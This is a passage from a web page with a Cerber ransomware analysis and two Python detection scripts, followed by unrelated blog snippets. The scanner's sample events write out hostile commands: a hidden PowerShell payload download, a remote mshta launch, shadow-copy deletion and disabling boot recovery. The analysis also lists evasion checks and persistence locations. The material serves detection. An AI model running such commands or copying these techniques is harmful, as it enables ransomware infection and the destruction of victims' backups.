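    # Step 2 of the attack cycle and the HTA scenario: an Office process
    # does not normally spawn a script host.
    if event.parent in OFFICE_PARENTS and event.image in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    low = event.cmdline.lower()
    for name, pattern in COMMANDLINE_RULES:
        if pattern.search(low):
            findings.append(name)
    return findings


def scan(lines):
    """Return (image, findings) for every event that raised at least one finding."""
    results = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        findings = evaluate(event)
        if findings:
            results.append((event.image, findings))
    return results


# Constructed events: paths, times and the host name are invented.
_PAYLOAD = r"C:\Users\victim\AppData\Roaming\{GUID-PLACEHOLDER}\profilest.exe"
SAMPLE_EVENTS = ["\t".join(f) for f in [
    ("2016-06-10T09:12:01Z", r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "
     "(New-Object Net.WebClient).DownloadFile('http://example.invalid/profilest.exe','profilest.exe')"),
    ("2016-06-10T09:12:03Z", r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/template.hta"),
    ("2016-06-10T09:12:09Z", _PAYLOAD, r"C:\Windows\System32\vssadmin.exe",
     "vssadmin.exe delete shadows /all /quiet"),
    ("2016-06-10T09:12:10Z", _PAYLOAD, r"C:\Windows\System32\wbem\WMIC.exe",
     "WMIC.exe shadowcopy delete"),
    ("2016-06-10T09:12:11Z", _PAYLOAD, r"C:\Windows\System32\bcdedit.exe",
     "bcdedit.exe /set {default} recoveryenabled no"),
    ("2016-06-10T09:30:00Z", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command Get-Date"),  # benign: interactive, not hidden
    ("2016-06-10T09:31:00Z", r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     r"C:\Windows\splwow64.exe", "splwow64.exe"),  # benign: print helper
]]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(image, ", ".join(findings))
```

    The parent/child rule fires on the first two events (the hidden PowerShell download and the mshta launch), and the command-line rules fire on the three tampering commands; the interactive PowerShell session and the print helper spawned by Word raise nothing. Ordering matters for response: the shadow-copy and bcdedit findings arrive only seconds before encryption begins, so the Office-spawned-script-host finding is the one worth alerting on in real time.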

    Coercion

    People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

    Figure 2. A message to the victim after encryption

    The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

    Figure 3. Ransom offered to victim, which is discounted for five days

    Multilingual Support

    As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

    Figure 4. Interface provided to the victim to pay ransom supports 12 languages

    Encryption

    Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

    Selective Targeting

    Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

    The attack also checked the system's keyboard layout to further ensure it avoided infecting machines in the attackers' geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

    Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

    Anti VM Checks

    The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

    Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

    Persistence

    Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

    • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
    • The “CommandProcessor” AutoRun key value is changed to point to the Cerber payload so that the malware is launched each time the Windows command interpreter, “cmd.exe”, is started.
    • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware, and Windows will execute it immediately after the infected user logs in.
    • Common persistence methods such as the Run and RunOnce keys are also used.
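
    The four persistence locations above are the ones an analyst should inspect on a suspect host. The following audit is an added example for this page (not code from FireEye or from the Cerber analysis): it applies the checks to a snapshot of those locations expressed as a plain dict, so it runs offline; the registry paths are the standard HKCU locations, while the snapshot contents, the victim profile path and the {GUID-PLACEHOLDER} folder name are constructed. On a live Windows host the same rules would be fed from winreg and a listing of the user's Startup folder.

```python
"""Audit of the autostart locations the post lists for Cerber: the screensaver
key, the Command Processor AutoRun value, the Run/RunOnce keys and the user's
Startup folder. Works on a snapshot dict constructed for this example, shaped
as {location: {value name or .lnk name: target}}."""
import re

HKCU = "HKEY_CURRENT_USER"
LOCATIONS = {
    "screensaver": HKCU + r"\Control Panel\Desktop",
    "command_processor": HKCU + r"\Software\Microsoft\Command Processor",
    "run": HKCU + r"\Software\Microsoft\Windows\CurrentVersion\Run",
    "runonce": HKCU + r"\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "startup_folder": r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
}

# Directories an unprivileged user can write to. An autostart entry pointing
# here deserves a look; Cerber's %APPDATA%\<GUID> copy lands in one of them.
USER_WRITABLE = re.compile(r"(\\appdata\\|%appdata%|%localappdata%|\\temp\\|%temp%)", re.I)


def executable_from(data):
    """Extract the program path from a registry command string, whether the
    path is quoted ("C:\\p\\app.exe" /arg) or bare (C:\\p\\app.exe /arg)."""
    d = data.strip()
    if d.startswith('"'):
        end = d.find('"', 1)
        return d[1:end] if end > 0 else d[1:]
    m = re.match(r"(.*?\.(?:exe|scr|bat|cmd|vbs|js|ps1))(?:\s|$)", d, re.I)
    return m.group(1) if m else d.split(" ")[0]


def audit(snapshot):
    """Return (location, name, data, reason) for each suspicious autostart entry."""
    findings = []
    ss = snapshot.get(LOCATIONS["screensaver"], {}).get("SCRNSAVE.EXE")
    if ss:
        exe = executable_from(ss)
        if not exe.lower().endswith(".scr") or USER_WRITABLE.search(exe):
            findings.append(("screensaver", "SCRNSAVE.EXE", ss,
                             "screensaver is not a system .scr file"))
    autorun = snapshot.get(LOCATIONS["command_processor"], {}).get("AutoRun")
    if autorun:
        # AutoRun runs on every cmd.exe start and is empty on a normal host.
        findings.append(("command_processor", "AutoRun", autorun,
                         "AutoRun executes each time cmd.exe starts"))
    for loc in ("run", "runonce", "startup_folder"):
        for name, data in snapshot.get(LOCATIONS[loc], {}).items():
            if USER_WRITABLE.search(executable_from(data)):
                findings.append((loc, name, data,
                                 "autostart target lives in a user-writable directory"))
    return findings


# Constructed snapshots of an infected profile and a clean one; paths are invented.
_PAYLOAD = r"C:\Users\victim\AppData\Roaming\{GUID-PLACEHOLDER}\profilest.exe"
INFECTED_SNAPSHOT = {
    LOCATIONS["screensaver"]: {"SCRNSAVE.EXE": _PAYLOAD, "ScreenSaveActive": "1"},
    LOCATIONS["command_processor"]: {"AutoRun": '"%s"' % _PAYLOAD},
    LOCATIONS["run"]: {"VendorUpdater": r'"C:\Program Files\Vendor\Updater.exe" /silent',
                       "profilest": _PAYLOAD},
    LOCATIONS["runonce"]: {"profilest": '"%s"' % _PAYLOAD},
    LOCATIONS["startup_folder"]: {"profilest.lnk": _PAYLOAD},
}
CLEAN_SNAPSHOT = {
    LOCATIONS["screensaver"]: {"SCRNSAVE.EXE": r"C:\Windows\system32\Bubbles.scr",
                               "ScreenSaveActive": "1"},
    LOCATIONS["command_processor"]: {},
    LOCATIONS["run"]: {"VendorUpdater": r'"C:\Program Files\Vendor\Updater.exe" /silent'},
    LOCATIONS["runonce"]: {},
    LOCATIONS["startup_folder"]: {},
}

if __name__ == "__main__":
    for location, name, data, reason in audit(INFECTED_SNAPSHOT):
        print("%-17s %-13s %s (%s)" % (location, name, data, reason))
```

    The user-writable heuristic is deliberately broad: per-user installers that legitimately live under AppData will also be flagged, so pair it with an allowlist of known-good entries rather than treating every hit as an infection. The AutoRun and screensaver checks are the higher-signal ones, since neither value is normally set to an executable outside the system directory.
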

    A Solid Defense

    Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

    Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

    Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

    FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

    Conclusion

    Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

    Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

    HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

    Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between the discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. Also, at FireEye, we go one step further and contact relevant authorities to bring down these types of campaigns.


    REVIEW – “The Florentine Deception”, Carey Nachenberg

    BKFLODEC.RVW   20150609
    “The Florentine Deception”, Carey Nachenberg, 2015, 978-1-5040-0924-9, U$13.49/C$18.91
    %A   Carey Nachenberg http://florentinedeception.com
    %C   345 Hudson Street, New York, NY   10014
    %D   2015
    %G   978-1-5040-0924-9 150400924X
    %I   Open Road Distribution
    %O   U$13.49/C$18.91 www.openroadmedia.com
    %O   http://www.amazon.com/exec/obidos/ASIN/150400924X/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/150400924X/robsladesinte-21
    %O   http://www.amazon.ca/exec/obidos/ASIN/150400924X/robsladesin03-20
    %O   Audience n+ Tech 3 Writing 2 (see revfaq.htm for explanation)
    %P   321 p.
    %T   “The …

    Google backpedals on its arbitrary vulnerability disclosure policy

    (LiveHacking.Com) – Google has been under fire in the last few weeks for arbitrarily disclosing zero-day vulnerabilities which give hackers the information they need to attack susceptible systems. When Google makes these disclosures it knows full well that it is risking the security and privacy of potentially millions of people. The positive side of these disclosures […]

    Microsoft to fix Windows vulnerability that Google publicly disclosed last week

    (LiveHacking.Com) – Microsoft will be issuing a series of security bulletins today (Patch Tuesday) to address security vulnerabilities in its products. One of these fixes will be for a vulnerability that Google intentionally disclosed to the public last week. Security experts at Google found a bug which could allow an attacker to gain elevated privileges on […]

    Microsoft fixes 24 security vulnerabilities in December’s Patch Tuesday

    (LiveHacking.Com) – As part of December’s Patch Tuesday, Microsoft has released seven security updates, three of which Microsoft has rated Critical, while the other four are rated Important in severity. These seven patches to address 24 security vulnerabilities in Microsoft Windows, Internet Explorer (IE), Office and Exchange. The first of the Critical patches is a cumulative […]

    Active Directory Unification and Attribute Cleanup

    I recently posted about Active Directory Unification. The main points were (1) that there is value in AD consolidation and (2) that there's a right way to do it to meet the intended goals.

    Sander Berkouwer posted earlier this month on Active Directory attribute integrity. He makes the point that with all the tools Microsoft provides to enable tighter management of identities and access (FIM, ADFS, ADRMS, DAC), Active Directory Cleanup is more important than ever. Berkouwer writes:
    "When these attributes are inconsistent, access to files, apps, partners and cloud functionality becomes inconsistent. If you think it won’t happen to you, think twice. During the first internal Microsoft deployment of Dynamic Access Control, attribute inconsistency was the first encountered problem."
    Absolutely.

    Most people that I speak with jump into the benefits that cleanup will have on the AD Unification process. The reality is that the real value of cleanup is enabling the right functionality and access controls after the unification process is complete. (Of course, as I wrote, it's never really complete - it's not a one-time event.)

    It's worth making the distinction.